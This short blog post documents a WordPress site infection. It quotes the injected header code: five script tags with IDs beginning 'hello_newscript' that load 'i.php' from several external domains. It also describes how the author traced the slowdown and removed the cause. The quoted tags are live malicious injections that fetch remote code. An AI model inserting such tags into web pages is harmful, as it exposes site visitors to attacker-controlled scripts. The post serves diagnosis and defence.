Today I encountered malware on WordPress that inserted several i.php requests into the website header, all with IDs starting with hello_newscript.
<script type='text/javascript' src='https://longtailmagic.com/domain/i.php?ver=5.6.2' id='hello_newscript0-js'></script> <script type='text/javascript' src='https://jadsupport.com/includes/i.php'?ver=5.6.2 id='hello_newscript1-js'></script> <script type='text/javascript' src='https://magaliefonteneau.com/wp-content/i.php?ver=5.6.2' id='hello_newscript2-js'></script> <script type='text/javascript' src='http://futuracp.com/images/i.php?ver=5.6.2' id='hello_newscript3-js'></script> <script type='text/javascript' src='http://casualwoodcreations.com/images/i.php?ver=5.6.2' id='hello_newscript4-js'></script>
The client's website exhibited slow loading speeds. Upon inspecting the source code, several unloadable js files were discovered, as shown in the image below:
Through source code analysis, it was determined that the above code had been inserted. Fortunately, some of these malicious websites had their servers shut down, while others had slow access speeds from within China. Therefore, aside from the slow speed, the website was not otherwise affected. The exact infection vector of this virus could not be determined, as after deleting several inactive plugins, the virus disappeared. It is likely that an inactive plugin was infected. This post is purely for documentation purposes, hoping you won't encounter this issue.
Comments are closed
The comment function for this article is closed. If you have any questions, please feel free to contact us through other channels.